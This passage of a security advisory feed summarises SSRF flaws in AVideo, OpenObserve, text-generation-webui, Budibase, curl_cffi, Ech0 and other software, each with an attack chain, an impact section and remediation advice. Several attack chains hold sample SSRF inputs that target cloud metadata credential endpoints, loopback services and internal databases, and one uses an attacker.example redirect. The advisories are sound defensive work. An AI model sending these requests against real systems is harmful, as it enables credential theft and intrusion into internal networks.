]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>openapi</category><category>mcp-from-openapi</category></item><item><title>IBM Verify and Security Verify Access Container Server-Side Request Forgery Vulnerability (CVE-2026-1343)</title><link>https://feed.craftedsignal.io/briefs/2026-04-ibm-verify-ssrf/</link><pubDate>Wed, 08 Apr 2026 01:16:40 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-ibm-verify-ssrf/</guid><description>CVE-2026-1343 allows an attacker to contact internal authentication endpoints protected by the Reverse Proxy in IBM Verify Identity Access Container and IBM Security Verify Access Container.</description><content:encoded><![CDATA[<p>IBM Verify Identity Access Container versions 11.0 through 11.0.2 and IBM Security Verify Access Container versions 10.0 through 10.0.9.1, as well as IBM Verify Identity Access versions 11.0 through 11.0.2 and IBM Security Verify Access versions 10.0 through 10.0.9.1, are vulnerable to Server-Side Request Forgery (SSRF). This flaw, identified as CVE-2026-1343, allows a remote, unauthenticated attacker to bypass the reverse proxy and access internal authentication endpoints. The vulnerability exists due to insufficient access controls on internal endpoints. Exploitation could lead to information disclosure or further compromise of the affected systems. Defenders should prioritize patching and monitoring for suspicious activity targeting internal resources.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies a vulnerable IBM Verify Identity Access or Security Verify Access Container instance.</li>
<li>The attacker crafts a malicious request targeting an internal authentication endpoint.</li>
<li>The crafted request bypasses the reverse proxy due to inadequate access controls.</li>
<li>The vulnerable server processes the malicious request, unintentionally exposing internal resources.</li>
<li>Sensitive information about internal systems is exposed to the attacker.</li>
<li>The attacker uses gathered information to perform unauthorized actions or further reconnaissance.</li>
<li>Attacker potentially compromises user accounts or internal infrastructure.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-1343 can lead to unauthorized access to sensitive internal information, potentially compromising user accounts and internal systems. This can result in data breaches, privilege escalation, and further attacks within the organization. While the specific number of affected organizations isn&rsquo;t available, any organization using vulnerable versions of IBM Verify Identity Access Container or IBM Security Verify Access Container is at risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the patch or upgrade to a secure version of IBM Verify Identity Access Container or IBM Security Verify Access Container as described in <a href="https://www.ibm.com/support/pages/node/7268253">IBM&rsquo;s advisory</a> to remediate CVE-2026-1343.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious Access to Internal Endpoints via Proxy Bypass</code> to detect exploitation attempts by monitoring web server logs for abnormal requests patterns targeting internal endpoints.</li>
<li>Implement network segmentation to restrict access to internal resources from the internet.</li>
<li>Review access control configurations on the reverse proxy to ensure proper protection of internal endpoints.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cve</category><category>cve-2026-1343</category><category>ssrf</category><category>ibm</category></item><item><title>WWBN AVideo SSRF Vulnerability via Incomplete CVE-2026-27732 Fix</title><link>https://feed.craftedsignal.io/briefs/2026-04-avideo-ssrf/</link><pubDate>Wed, 08 Apr 2026 00:08:47 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-avideo-ssrf/</guid><description>WWBN AVideo is vulnerable to Server-Side Request Forgery (SSRF) due to an incomplete fix for CVE-2026-27732, allowing authenticated uploaders to bypass SSRF protection by providing a `downloadURL` with a common media extension, leading to internal response exfiltration.</description><content:encoded><![CDATA[<p>WWBN AVideo, a video-sharing platform, is susceptible to Server-Side Request Forgery (SSRF) vulnerability due to an incomplete patch for CVE-2026-27732. The vulnerability exists in the <code>objects/aVideoEncoder.json.php</code> script. An authenticated uploader can provide a malicious <code>downloadURL</code> containing a common media extension like <code>.mp4</code>, <code>.jpg</code>, <code>.gif</code>, or <code>.zip</code>, bypassing SSRF validation. This allows the attacker to force the server to fetch internal resources. The server fetches the specified URL using <code>url_get_contents()</code>, stores the response as media content, and makes it accessible through the <code>/videos/...</code> endpoint. This vulnerability, identified as CVE-2026-39370, affects AVideo versions 26.0 and earlier. Exploitation enables exfiltration of sensitive data from internal APIs and services.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker logs in as a low-privilege authenticated user with upload privileges.</li>
<li>The attacker crafts a malicious <code>downloadURL</code> pointing to an internal resource (e.g., <code>http://127.0.0.1:9998/probe.mp4</code>).</li>
<li>The attacker sends a POST request to <code>/objects/aVideoEncoder.json.php</code> with the <code>downloadURL</code> and a valid <code>format</code> parameter (e.g., <code>mp4</code>).</li>
<li>AVideo&rsquo;s <code>downloadVideoFromDownloadURL()</code> function extracts the extension and incorrectly skips <code>isSSRFSafeURL()</code> validation due to the allowlisted extension.</li>
<li>The server fetches the content from the attacker-controlled <code>downloadURL</code> using <code>url_get_contents()</code>.</li>
<li>The fetched content is written into video storage.</li>
<li>The attacker retrieves the media metadata using <code>GET /objects/videos.json.php?showAll=1</code> to obtain the <code>videosURL.mp4.url</code>.</li>
<li>The attacker downloads the media URL and recovers the content from the internal resource.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows an authenticated uploader to force the AVideo server to fetch internal resources and persist the response as media content. This Server-Side Request Forgery (SSRF) vulnerability allows internal response exfiltration from private APIs, admin endpoints, or other internal services reachable from the application host. The number of potential victims is related to the installations of AVideo with versions less than or equal to 26.0, and the sectors primarily affected are likely media and entertainment, as well as organizations utilizing AVideo for internal video hosting.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply <code>isSSRFSafeURL()</code> to all <code>downloadURL</code> inputs in <code>objects/aVideoEncoder.json.php</code>, regardless of file extension to remediate CVE-2026-39370.</li>
<li>Deploy the Sigma rule &ldquo;Detect AVideo SSRF Attempt via DownloadURL&rdquo; to identify potential exploitation attempts based on requests to <code>/objects/aVideoEncoder.json.php</code>.</li>
<li>Restrict upload-by-URL functionality to an explicit allowlist of trusted fetch origins.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>avideo</category><category>cve-2026-39370</category></item><item><title>OpenObserve SSRF via Improper IPv6 Validation</title><link>https://feed.craftedsignal.io/briefs/2024-01-30-openobserve-ssrf/</link><pubDate>Tue, 07 Apr 2026 20:16:29 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-30-openobserve-ssrf/</guid><description>OpenObserve versions 0.70.3 and earlier are vulnerable to a server-side request forgery (SSRF) attack due to improper validation of IPv6 addresses in the validate_enrichment_url function, potentially allowing authenticated attackers to access internal services and retrieve sensitive cloud metadata.</description><content:encoded><![CDATA[<p>OpenObserve, a cloud-native observability platform, contains a server-side request forgery (SSRF) vulnerability (CVE-2026-39361) in versions 0.70.3 and earlier. The vulnerability resides in the <code>validate_enrichment_url</code> function within <code>src/handler/http/request/enrichment_table/mod.rs</code>. This function fails to properly block IPv6 addresses due to the Rust&rsquo;s <code>url</code> crate returning IPv6 addresses with surrounding brackets (e.g., &ldquo;[::1]&rdquo;) instead of without. This allows an authenticated attacker to bypass intended restrictions and access internal services that are normally blocked from external access. Successful exploitation can lead to the retrieval of sensitive IAM credentials via AWS IMDSv1 (169.254.169.254), GCP metadata, or Azure IMDS on cloud deployments, and probing of internal network services on self-hosted deployments.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An authenticated attacker identifies the <code>validate_enrichment_url</code> function as a potential SSRF target.</li>
<li>The attacker crafts a malicious URL containing an IPv6 address with surrounding brackets (e.g., <code>http://[::1]</code>).</li>
<li>The attacker submits a request to the OpenObserve server, providing the malicious URL to the <code>validate_enrichment_url</code> function.</li>
<li>The <code>validate_enrichment_url</code> function fails to properly validate the IPv6 address due to the brackets.</li>
<li>The OpenObserve server initiates a request to the attacker-specified IPv6 address, bypassing intended access restrictions.</li>
<li>In a cloud environment, the attacker targets the AWS IMDSv1 endpoint (169.254.169.254) to retrieve IAM credentials.</li>
<li>The OpenObserve server retrieves the IAM credentials from the IMDSv1 endpoint and returns them to the attacker.</li>
<li>The attacker uses the stolen IAM credentials to gain unauthorized access to cloud resources.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability can lead to significant consequences, especially in cloud deployments. An attacker can retrieve sensitive IAM credentials from cloud metadata services like AWS IMDSv1 (169.254.169.254), GCP metadata, or Azure IMDS. These stolen credentials can then be used to gain unauthorized access to critical cloud resources, potentially leading to data breaches, service disruption, and financial losses. The vulnerability affects OpenObserve instances version 0.70.3 and earlier. The number of affected organizations is currently unknown, but any organization using a vulnerable version of OpenObserve is at risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade OpenObserve to a version greater than 0.70.3 to patch CVE-2026-39361.</li>
<li>Monitor network connections originating from OpenObserve servers to internal IP addresses such as 169.254.169.254 using the provided Sigma rule to detect potential SSRF attempts.</li>
<li>Implement network segmentation and access controls to limit the impact of a successful SSRF attack, restricting access from OpenObserve servers to sensitive internal services.</li>
<li>Consider disabling IMDSv1 and migrating to IMDSv2 on AWS EC2 instances to mitigate the risk of IAM credential theft.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>openobserve</category><category>cloud</category><category>vulnerability</category></item><item><title>text-generation-webui SSRF Vulnerability (CVE-2026-35486)</title><link>https://feed.craftedsignal.io/briefs/2026-04-text-generation-webui-ssrf/</link><pubDate>Tue, 07 Apr 2026 16:16:26 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-text-generation-webui-ssrf/</guid><description>The text-generation-webui application before version 4.3 is vulnerable to server-side request forgery (SSRF) due to insufficient validation of user-supplied URLs by the superbooga and superboogav2 RAG extensions, potentially leading to credential theft and internal network reconnaissance.</description><content:encoded><![CDATA[<p>The text-generation-webui application is an open-source web interface for running Large Language Models (LLMs). Prior to version 4.3, the superbooga and superboogav2 RAG (Retrieval-Augmented Generation) extensions are susceptible to a Server-Side Request Forgery (SSRF) vulnerability. These extensions fetch user-provided URLs using the <code>requests.get()</code> function without proper validation. Specifically, there are no checks for URL schemes (e.g., <code>file://</code>, <code>gopher://</code>), IP address filtering, or hostname whitelisting. This lack of validation allows a malicious actor to craft URLs that target internal resources, cloud metadata endpoints (e.g., AWS, Azure, GCP), and other sensitive services. Successful exploitation can lead to the exfiltration of sensitive data, including IAM credentials, and allow an attacker to probe internal network infrastructure. Version 4.3 of text-generation-webui addresses this vulnerability.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies an instance of text-generation-webui running a vulnerable version (prior to 4.3) with the superbooga or superboogav2 RAG extension enabled.</li>
<li>The attacker crafts a malicious URL targeting a cloud metadata endpoint (e.g., <code>http://169.254.169.254/latest/meta-data/iam/security-credentials/</code>).</li>
<li>The attacker injects the malicious URL into a text-generation-webui RAG extension user input field.</li>
<li>The application, using the <code>requests.get()</code> function, fetches the content from the attacker-controlled URL without validation.</li>
<li>The cloud metadata, containing potentially sensitive information like temporary IAM credentials, is retrieved by the application.</li>
<li>The retrieved data is processed through the RAG pipeline.</li>
<li>The attacker leverages the RAG pipeline to extract the content from the application.</li>
<li>The attacker uses the exfiltrated credentials to access and compromise other resources within the victim&rsquo;s cloud environment.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-35486 can have significant consequences. An attacker can potentially gain unauthorized access to cloud resources by stealing IAM credentials. This could lead to data breaches, service disruption, and financial loss. The vulnerability affects any text-generation-webui instance running a version prior to 4.3 with the vulnerable RAG extensions enabled, impacting individuals and organizations utilizing this software for LLM-based applications.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade text-generation-webui to version 4.3 or later to remediate the SSRF vulnerability (CVE-2026-35486).</li>
<li>Deploy the Sigma rule &ldquo;Detect text-generation-webui SSRF Attempt&rdquo; to your SIEM to detect exploitation attempts targeting cloud metadata endpoints.</li>
<li>Monitor web server logs for outbound connections to internal IP addresses (e.g., 169.254.169.254) originating from the text-generation-webui application.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>text-generation-webui</category><category>cve-2026-35486</category><category>cloud</category></item><item><title>GPT Researcher Server-Side Request Forgery Vulnerability (CVE-2026-5633)</title><link>https://feed.craftedsignal.io/briefs/2026-04-gpt-researcher-ssrf/</link><pubDate>Mon, 06 Apr 2026 08:16:39 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-gpt-researcher-ssrf/</guid><description>A server-side request forgery (SSRF) vulnerability exists in assafelovic gpt-researcher up to version 3.4.3, affecting the ws Endpoint component, allowing a remote attacker to manipulate the source_urls argument and potentially access internal resources or conduct further attacks.</description><content:encoded><![CDATA[<p>A server-side request forgery (SSRF) vulnerability, identified as CVE-2026-5633, affects assafelovic&rsquo;s gpt-researcher version 3.4.3 and earlier. The vulnerability resides within the ws Endpoint component and is triggered by manipulating the <code>source_urls</code> argument. This flaw allows a remote attacker to potentially force the application to make requests to arbitrary internal or external resources. A publicly disclosed exploit exists, increasing the risk of exploitation. The developers were notified through an issue report, but have not yet responded. This vulnerability is a significant concern for organizations using gpt-researcher, as it can lead to sensitive data exposure or further attacks originating from the application&rsquo;s server.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies a gpt-researcher instance running version 3.4.3 or earlier.</li>
<li>Attacker crafts a malicious request containing a manipulated <code>source_urls</code> argument. This URL points to an internal resource or an external server controlled by the attacker.</li>
<li>The gpt-researcher application, specifically the ws Endpoint component, processes the request without proper validation of the <code>source_urls</code> parameter.</li>
<li>The application initiates a request to the attacker-specified URL, effectively acting as a proxy.</li>
<li>If the URL points to an internal resource, the attacker gains access to potentially sensitive data or internal services not intended for public access.</li>
<li>If the URL points to an external server controlled by the attacker, the server receives the request, revealing information about the gpt-researcher instance, such as its IP address.</li>
<li>The attacker can then leverage this information to further compromise the server or the network it resides on, potentially leading to lateral movement or data exfiltration.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-5633 can allow an attacker to perform actions they are not authorized to do. This includes reading internal data, accessing internal services, or using the vulnerable server as a proxy for further attacks. While the exact number of victims is unknown, any organization using a vulnerable version of gpt-researcher is at risk. The consequences of a successful SSRF attack can range from information disclosure to full server compromise, depending on the internal resources accessible to the application.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Inspect web server access logs for requests containing suspicious URLs in the <code>source_urls</code> parameter that point to internal or unexpected external resources. This can aid in detecting ongoing exploitation attempts (logsource: webserver, product: linux/windows).</li>
<li>Apply input validation to the <code>source_urls</code> parameter to ensure that the application only makes requests to authorized and expected resources.</li>
<li>Monitor network connections originating from the gpt-researcher server for unusual outbound traffic to internal or external IP addresses (logsource: network_connection, product: windows/linux).</li>
<li>Deploy the provided Sigma rule to detect potential SSRF attempts by monitoring for suspicious URL patterns in web server logs.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>cve-2026-5633</category><category>gpt-researcher</category></item><item><title>Budibase REST Connector SSRF via Empty Blacklist</title><link>https://feed.craftedsignal.io/briefs/2026-04-budibase-ssrf/</link><pubDate>Sat, 04 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-budibase-ssrf/</guid><description>A critical Server-Side Request Forgery (SSRF) vulnerability in Budibase's REST datasource connector allows attackers with Builder privileges to exfiltrate sensitive data from internal network services due to a missing default IP blacklist.</description><content:encoded><![CDATA[<p>A critical Server-Side Request Forgery (SSRF) vulnerability exists in Budibase version 3.30.6, affecting self-hosted instances that do not explicitly configure the <code>BLACKLIST_IPS</code> environment variable. The vulnerability resides within the REST datasource connector and the backend-core blacklist module. Due to the absence of a default IP blacklist, the <code>isBlacklisted()</code> function in <code>packages/backend-core/src/blacklist/blacklist.ts</code> unconditionally returns <code>false</code>, bypassing SSRF protection. This allows users with <code>Builder</code> privileges or <code>QUERY WRITE</code> permissions to create malicious REST datasources, query internal services, and exfiltrate sensitive data, including CouchDB credentials, application data, and internal service metadata. This vulnerability impacts confidentiality, integrity, and availability, potentially leading to complete instance takeover.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker with <code>Builder</code> privileges logs into the Budibase application.</li>
<li>The attacker creates a new REST datasource via <code>POST /api/datasources</code>, configuring it to target an internal service like <code>http://couchdb-service:5984</code>.</li>
<li>The Budibase server, specifically the <code>packages/server/src/integrations/rest.ts</code> component, evaluates the URL against the blacklist. Due to the empty <code>BLACKLIST_IPS</code>, the <code>isBlacklisted()</code> function returns <code>false</code>.</li>
<li>The REST integration proceeds with the request using the <code>fetch</code> API, sending the request to the specified internal service.</li>
<li>The internal service (e.g., CouchDB) responds with data.</li>
<li>The attacker creates a query via <code>POST /api/queries</code> that uses the malicious REST datasource.</li>
<li>The attacker executes the query via <code>POST /api/v2/queries/:id</code>, triggering a request to the internal service.</li>
<li>The response from the internal service, containing sensitive data like database credentials or application data, is returned to the attacker, enabling data exfiltration or further exploitation.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows attackers to read CouchDB databases, including user credentials (bcrypt password hashes) and platform configurations. They can also modify user records, create new admin accounts, alter application data, or delete databases. The vulnerability enables resource exhaustion, database destruction, and service disruption. The vulnerability crosses the security boundary between the Budibase application layer and the infrastructure layer, granting access to CouchDB, MinIO, Redis, and other internal services.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately set the <code>BLACKLIST_IPS</code> environment variable in your Budibase deployment to include at least <code>127.0.0.1</code>, private IP ranges (<code>10.0.0.0/8</code>, <code>172.16.0.0/12</code>, <code>192.168.0.0/16</code>), link-local addresses (<code>169.254.0.0/16</code>), and cloud metadata endpoints to mitigate the SSRF vulnerability.</li>
<li>Restrict <code>BUILDER</code> role access to only trusted users. Consider using the principle of least privilege for application-level permissions.</li>
<li>Deploy the Sigma rule &ldquo;Detect Budibase REST Datasource Creation Targeting Internal IPs&rdquo; to your SIEM and tune for your environment to detect potential exploitation attempts.</li>
<li>If you have unpatched instances of Budibase and have granted <code>QUERY WRITE</code> permissions widely, immediately audit and revoke those permissions from untrusted users.</li>
<li>Monitor webserver logs for unusual requests originating from the Budibase application server to internal IP addresses or services, particularly those used by CouchDB, Redis, or MinIO, to identify potential SSRF attempts.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>ssrf</category><category>budibase</category><category>vulnerability</category></item><item><title>curl_cffi SSRF Vulnerability via Redirects</title><link>https://feed.craftedsignal.io/briefs/2026-04-curl-cffi-ssrf/</link><pubDate>Fri, 03 Apr 2026 21:36:44 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-curl-cffi-ssrf/</guid><description>curl_cffi versions before 0.15.0 are vulnerable to server-side request forgery (SSRF) due to unrestricted redirects to internal IP ranges, potentially enabling access to sensitive internal resources and cloud metadata.</description><content:encoded><![CDATA[<p>The curl_cffi library, a Python binding for libcurl, is susceptible to a server-side request forgery (SSRF) vulnerability in versions prior to 0.15.0. This flaw stems from the library&rsquo;s unrestricted handling of redirects, allowing attacker-controlled URLs to redirect requests to internal IP ranges and services. An attacker can exploit this behavior to access sensitive information such as cloud metadata or bypass network controls. The vulnerability is triggered because curl_cffi automatically follows redirects (CURLOPT_FOLLOWLOCATION = 1) without validating the destination. Additionally, the TLS impersonation feature in curl_cffi can further obscure malicious requests by mimicking legitimate browser traffic, potentially bypassing TLS-based filtering mechanisms. This issue is similar to other redirect-based SSRF vulnerabilities, like CVE-2025-68616.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies a curl_cffi application vulnerable to SSRF.</li>
<li>The attacker crafts a malicious URL pointing to an attacker-controlled server (attacker.example).</li>
<li>The victim application uses curl_cffi to request the attacker-controlled URL.</li>
<li>The attacker&rsquo;s server responds with an HTTP 302 redirect to an internal IP address (e.g., 169.254.169.254, the cloud metadata endpoint).</li>
<li>curl_cffi automatically follows the redirect without validation.</li>
<li>The request is sent to the internal IP address, bypassing external access controls.</li>
<li>The internal service (e.g., cloud metadata API) responds with sensitive information.</li>
<li>The attacker retrieves the sensitive information from the victim application&rsquo;s logs or response data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows an attacker to access internal network services and sensitive cloud metadata. This can lead to the exposure of API keys, credentials, and other confidential information. The impact can range from unauthorized access to internal applications and data to potential compromise of cloud infrastructure. All applications using curl_cffi versions before 0.15.0 are vulnerable. The severity is high due to the potential for significant data breaches and infrastructure compromise.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to curl_cffi version 0.15.0 or later to patch CVE-2026-33752.</li>
<li>Implement server-side input validation to prevent passing attacker-controlled URLs to curl_cffi.</li>
<li>Monitor network traffic for connections to internal IP ranges (127.0.0.1, 169.254.0.0/16) originating from processes using curl_cffi.  Create a network_connection rule to detect this activity.</li>
<li>Inspect web server logs for HTTP 302 redirects to internal IP addresses, which could indicate SSRF attempts. Deploy a webserver rule to detect this.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>curl_cffi</category><category>cloud</category></item><item><title>prompts.chat Fal.ai SSRF Vulnerability (CVE-2026-22664)</title><link>https://feed.craftedsignal.io/briefs/2026-04-prompts-chat-ssrf/</link><pubDate>Fri, 03 Apr 2026 21:17:09 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-prompts-chat-ssrf/</guid><description>prompts.chat prior to commit 30a8f04 is vulnerable to server-side request forgery (SSRF) in Fal.ai media status polling, allowing authenticated users to perform arbitrary outbound requests by supplying attacker-controlled URLs, leading to potential credential theft and internal network probing.</description><content:encoded><![CDATA[<p>prompts.chat, a web application, contains a server-side request forgery (SSRF) vulnerability affecting versions prior to commit 30a8f04. This flaw resides in the Fal.ai media status polling feature. An authenticated user can inject arbitrary URLs into the <code>token</code> parameter, causing the server to make outbound requests to attacker-controlled destinations. The vulnerability, identified as CVE-2026-22664, allows attackers to potentially extract the <code>FAL_API_KEY</code> from the <code>Authorization</code> header during these requests. Successful exploitation can result in credential theft, internal network probing, and abuse of the victim&rsquo;s Fal.ai account. This vulnerability poses a significant risk as it could lead to unauthorized access and data breaches.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker authenticates to the prompts.chat application.</li>
<li>Attacker crafts a malicious URL containing a server controlled by them.</li>
<li>The attacker initiates a media status polling request to Fal.ai, injecting the malicious URL into the <code>token</code> parameter.</li>
<li>The prompts.chat server, lacking proper URL validation, makes an outbound HTTP request to the attacker&rsquo;s server.</li>
<li>The request includes the <code>Authorization</code> header, potentially exposing the <code>FAL_API_KEY</code>.</li>
<li>The attacker&rsquo;s server captures the <code>Authorization</code> header containing the <code>FAL_API_KEY</code>.</li>
<li>The attacker uses the stolen <code>FAL_API_KEY</code> to access the victim&rsquo;s Fal.ai account.</li>
<li>The attacker performs unauthorized actions, such as data exfiltration or resource abuse.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability (CVE-2026-22664) allows attackers to steal the <code>FAL_API_KEY</code>, potentially impacting all users of the vulnerable prompts.chat application who utilize the Fal.ai integration. Consequences include unauthorized access to Fal.ai accounts, data breaches, internal network scans originating from the prompts.chat server, and financial losses due to resource abuse. The specific number of victims and the extent of the damage depend on the attacker&rsquo;s objectives and the permissions associated with the compromised Fal.ai API key.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Inspect web server logs for outbound requests to unusual or suspicious domains originating from the prompts.chat server to detect potential SSRF attempts (log source: webserver).</li>
<li>Deploy the provided Sigma rule to detect HTTP requests containing a suspicious <code>token</code> parameter potentially indicative of SSRF exploitation.</li>
<li>Monitor network traffic for unusual outbound connections from the prompts.chat server (log source: network_connection).</li>
<li>Apply the patch or upgrade prompts.chat to a version after commit 30a8f04, which addresses the CVE-2026-22664 vulnerability.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>cve-2026-22664</category><category>fal.ai</category><category>prompts.chat</category></item><item><title>Ech0 Unauthenticated Server-Side Request Forgery Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-ech0-ssrf/</link><pubDate>Fri, 03 Apr 2026 03:30:53 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-ech0-ssrf/</guid><description>Ech0 is vulnerable to Server-Side Request Forgery (SSRF) due to an unauthenticated API endpoint (`/api/website/title`) that fetches website titles from user-controlled URLs, lacking proper validation and TLS verification, allowing attackers to access internal resources and potentially cause denial of service.</description><content:encoded><![CDATA[<p>The Ech0 application suffers from an unauthenticated Server-Side Request Forgery (SSRF) vulnerability in its website preview feature. The <code>/api/website/title</code> endpoint, intended to fetch website titles, accepts a fully attacker-controlled URL without authentication. This allows anyone who can reach the Ech0 instance to force the server to make HTTP/HTTPS requests to arbitrary URLs. The application lacks a host allowlist, SSRF filter, and disables TLS certificate validation (<code>InsecureSkipVerify: true</code>). The backend reads the full HTML body into memory, which combined with enabled HTTP redirect following and the insecure TLS setting, allows attackers to target internal services and potentially cause a denial of service. The vulnerability is present in Ech0 versions prior to 1.4.8-0.20260401031029-4ca56fea5ba4.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies an Ech0 instance and the <code>/api/website/title</code> endpoint.</li>
<li>The attacker crafts a malicious URL targeting an internal resource or a service on the Ech0 server&rsquo;s network.</li>
<li>The attacker sends an unauthenticated GET request to <code>/api/website/title</code> with the <code>website_url</code> parameter set to the malicious URL (e.g., <code>http://127.0.0.1:6277/api/website/title?website_url=http://host.docker.internal:9999/poc_ssrf_proof.html</code>).</li>
<li>The Ech0 server, lacking proper validation, makes an HTTP(S) request to the attacker-specified URL using <code>internal/util/http/http.go</code>.</li>
<li>If the targeted URL redirects, the Ech0 server follows the redirect due to the default <code>http.Client</code> behavior.</li>
<li>The Ech0 server reads the entire response body into memory using <code>io.ReadAll</code>, potentially leaking sensitive information or causing a denial of service if the response is large.</li>
<li>The Ech0 server parses the HTML body looking for the title and returns the title, or an error message, to the attacker.</li>
<li>The attacker gains access to information from internal services or causes a denial-of-service condition by exhausting server resources.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This SSRF vulnerability allows unauthenticated attackers to force the Ech0 server to make HTTP(S) requests to internal or reserved targets reachable from the server&rsquo;s network. A successful attack can lead to information disclosure, such as leaking cloud metadata from <code>169.254.169.254</code>-class endpoints, or access to internal services that are not exposed to the public internet. The <code>io.ReadAll</code> function makes the Ech0 server susceptible to denial-of-service attacks if the attacker provides a URL that returns a large response. The number of victims depends on the deployment of the Ech0 application and the accessibility of internal resources from the Ech0 server&rsquo;s network.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Detect Ech0 SSRF via Website Title API</code> to detect attempts to exploit this vulnerability by monitoring requests to the <code>/api/website/title</code> endpoint with suspicious URLs.</li>
<li>Block access to internal metadata endpoints like <code>169.254.169.254</code> from the Ech0 server if not explicitly required, mitigating the risk of cloud metadata exposure.</li>
<li>Apply the patch by upgrading to Ech0 version 1.4.8-0.20260401031029-4ca56fea5ba4 or later, addressing the underlying code flaws (CVE-2026-35036).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>ech0</category><category>web-application</category></item><item><title>Azure Databricks SSRF Vulnerability (CVE-2026-33107) Allows Privilege Escalation</title><link>https://feed.craftedsignal.io/briefs/2026-04-azure-databricks-ssrf/</link><pubDate>Fri, 03 Apr 2026 00:16:05 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-azure-databricks-ssrf/</guid><description>A server-side request forgery (SSRF) vulnerability, identified as CVE-2026-33107, exists in Azure Databricks, allowing an unauthorized attacker to elevate privileges over a network.</description><content:encoded><![CDATA[<p>CVE-2026-33107 describes a critical server-side request forgery (SSRF) vulnerability affecting Azure Databricks. This vulnerability allows an unauthenticated attacker to potentially elevate their privileges within the network. Successful exploitation could allow an attacker to access sensitive data, modify configurations, or potentially gain complete control over the Databricks environment. The vulnerability was published on April 2nd, 2026. Due to the nature of SSRF, this vulnerability could be exploited remotely, making it a high-risk issue for organizations utilizing Azure Databricks. This vulnerability matters because it can lead to significant data breaches, service disruption, and compromise of sensitive resources managed within the Azure Databricks environment.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies an endpoint within the Azure Databricks environment vulnerable to SSRF.</li>
<li>The attacker crafts a malicious HTTP request targeting an internal resource. The request is designed to exploit the SSRF vulnerability.</li>
<li>The Databricks server, processing the crafted request, unwittingly sends it to the specified internal resource.</li>
<li>The internal resource responds to the Databricks server with data intended only for internal consumption.</li>
<li>The attacker leverages the SSRF vulnerability to bypass authentication or authorization checks, gaining access to the internal resource.</li>
<li>The attacker escalates privileges by abusing the compromised internal resource or service. This may involve modifying configurations, accessing restricted data, or executing privileged commands.</li>
<li>The attacker uses the elevated privileges to move laterally within the network, compromising additional resources.</li>
<li>The attacker achieves their final objective, such as data exfiltration, denial of service, or complete control of the Azure Databricks environment.</li>
</ol>
<h2 id="impact">Impact</h2>
